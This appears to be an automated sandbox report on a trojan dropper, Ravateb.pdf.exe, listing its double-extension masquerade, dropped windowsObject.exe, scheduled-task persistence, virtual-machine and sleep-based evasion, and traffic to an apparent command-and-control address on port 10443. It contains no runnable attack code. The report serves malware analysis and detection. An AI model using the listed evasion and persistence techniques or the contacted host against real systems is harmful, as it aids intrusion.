Source: Ravateb.pdf.exe, 00000000.00000002.1372556909.0000000002C81000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: OriginalFilenameprogram.exe0 vs Ravateb.pdf.exe
Source: Ravateb.pdf.exe, 00000000.00000000.1167863344.00000000009D6000.00000002.00000001.01000000.00000003.sdmp -- Binary or memory string: OriginalFilenamewindowsObject.exe< vs Ravateb.pdf.exe
Source: Ravateb.pdf.exe, 00000000.00000002.1372556909.0000000002E74000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: OriginalFilenameprogram.exe0 vs Ravateb.pdf.exe
Source: Ravateb.pdf.exe -- Binary or memory string: OriginalFilenamewindowsObject.exe< vs Ravateb.pdf.exe
Source: Ravateb.pdf.exe, Class1.cs -- Base64 encoded string: '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
Source: classification engine -- Classification label: mal100.troj.evad.winEXE@2/3@0/1
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- File created: C:\users\user\AppData\Roaming\Microsoft\WindowsObject
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Mutant created: NULL
Source: Ravateb.pdf.exe -- Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ravateb.pdf.exe -- Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Ravateb.pdf.exe -- ReversingLabs: Detection: 52%
Source: Ravateb.pdf.exe -- Virustotal: Detection: 56%
Source: Ravateb.pdf.exe -- String found in binary or memory: 5DisallowStartIfOnBatteries-StopIfGoingOnBatteries!AllowDemandStart%StartWhenAvailable
Source: unknown -- Process created: C:\Users\user\Desktop\Ravateb.pdf.exe "C:\Users\user\Desktop\Ravateb.pdf.exe"
Source: unknown -- Process created: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: version.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: sxs.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Ravateb.pdf.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ravateb.pdf.exe -- Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Ravateb.pdf.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ravateb.pdf.exe -- Static PE information: 0xB2D854D6 [Fri Jan 30 06:19:02 2065 UTC]
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA00BD pushad ; iretd 0_2_00007FFC3DDA00C1
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DE87EB2 pushad ; ret 0_2_00007FFC3DE88071
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Code function: 8_2_00007FFC3DE400BD pushad ; iretd 8_2_00007FFC3DE400C1

          Persistence and Installation Behavior

Source: Yara match -- File source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Ravateb.pdf.exe PID: 7532, type: MEMORYSTR
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- File created: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe

          Boot Survival

Source: Yara match -- File source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Ravateb.pdf.exe PID: 7532, type: MEMORYSTR

          Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.exe -- Static PE information: Ravateb.pdf.exe
Source: unknown -- Network traffic detected: HTTP traffic on port 49721 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49721
Source: unknown -- Network traffic detected: HTTP traffic on port 49722 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49722
Source: unknown -- Network traffic detected: HTTP traffic on port 49723 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49723
Source: unknown -- Network traffic detected: HTTP traffic on port 49724 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49724
Source: unknown -- Network traffic detected: HTTP traffic on port 49726 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49726
Source: unknown -- Network traffic detected: HTTP traffic on port 49727 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49727
Source: unknown -- Network traffic detected: HTTP traffic on port 49728 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49728
Source: unknown -- Network traffic detected: HTTP traffic on port 49729 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49729
Source: unknown -- Network traffic detected: HTTP traffic on port 49730 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49730
Source: unknown -- Network traffic detected: HTTP traffic on port 49731 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49731
Source: unknown -- Network traffic detected: HTTP traffic on port 49732 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49732
Source: unknown -- Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49733
Source: unknown -- Network traffic detected: HTTP traffic on port 49734 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49734
Source: unknown -- Network traffic detected: HTTP traffic on port 49735 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49735
Source: unknown -- Network traffic detected: HTTP traffic on port 49736 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49736
Source: unknown -- Network traffic detected: HTTP traffic on port 49737 -> 10443
Source: unknown -- Network traffic detected: HTTP traffic on port 10443 -> 49737
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Memory allocated: 1AC80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Memory allocated: 1570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Memory allocated: 1B1D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Ravateb.pdf.exe TID: 7556 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -115355s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -65000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -84005s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -79083s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -90083s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -111560s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -73327s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -85200s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -110955s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -94551s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -69363s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -115524s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -100385s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -108688s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -114233s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -94273s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744 -- Thread sleep time: -67182s >= -30000s
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BaseBoard
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Last function: Thread delayed
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 115355
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 84005
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 79083
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 90083
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 111560
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 73327
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Thread delayed: delay time: 85200
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 110955Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 94551Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 69363Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 115524Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 100385Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 108688Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 114233Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 94273Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 67182Jump to behavior
          Source: Ravateb.pdf.exeBinary or memory string: vmware
          Source: windowsObject.exe, 00000008.00000002.2436238913.000000001BE07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Users\user\Desktop\Ravateb.pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown in the report for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (1); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (1); Obfuscated Files or Information (211); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (111); Virtualization/Sandbox Evasion (41); System Information Discovery (32); System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1); Non-Standard Port (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 1636359; Sample: Ravateb.pdf.exe; Startdate: 12/03/2025; Architecture: WINDOWS; Score: 100)

• Signatures on the start node: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Sigma detected: Suspicious Double Extension File Execution; 7 other signatures
• Process started: Ravateb.pdf.exe
  • Dropped files: C:\Users\user\AppData\...\windowsObject.exe (PE32); C:\Users\user\...\windowsObject.exe.config (XML); C:\Users\user\AppData\...\Ravateb.pdf.exe.log (ASCII)
• Process started: windowsObject.exe
  • DNS/IP: 89.46.233.239, ports 10443, 49721, 49722 (ALTER-NET-ASZorilorNr11SfGheorgheRO, Romania)
  • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file

Source | Detection | Scanner | Label
Ravateb.pdf.exe | 53% | ReversingLabs | Win32.Trojan.Generic
Ravateb.pdf.exe | 56% | Virustotal |
Ravateb.pdf.exe | 100% | Avira | TR/Drop.Agent.rdgar

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe | 100% | Avira | TR/Drop.Agent.uvdrx
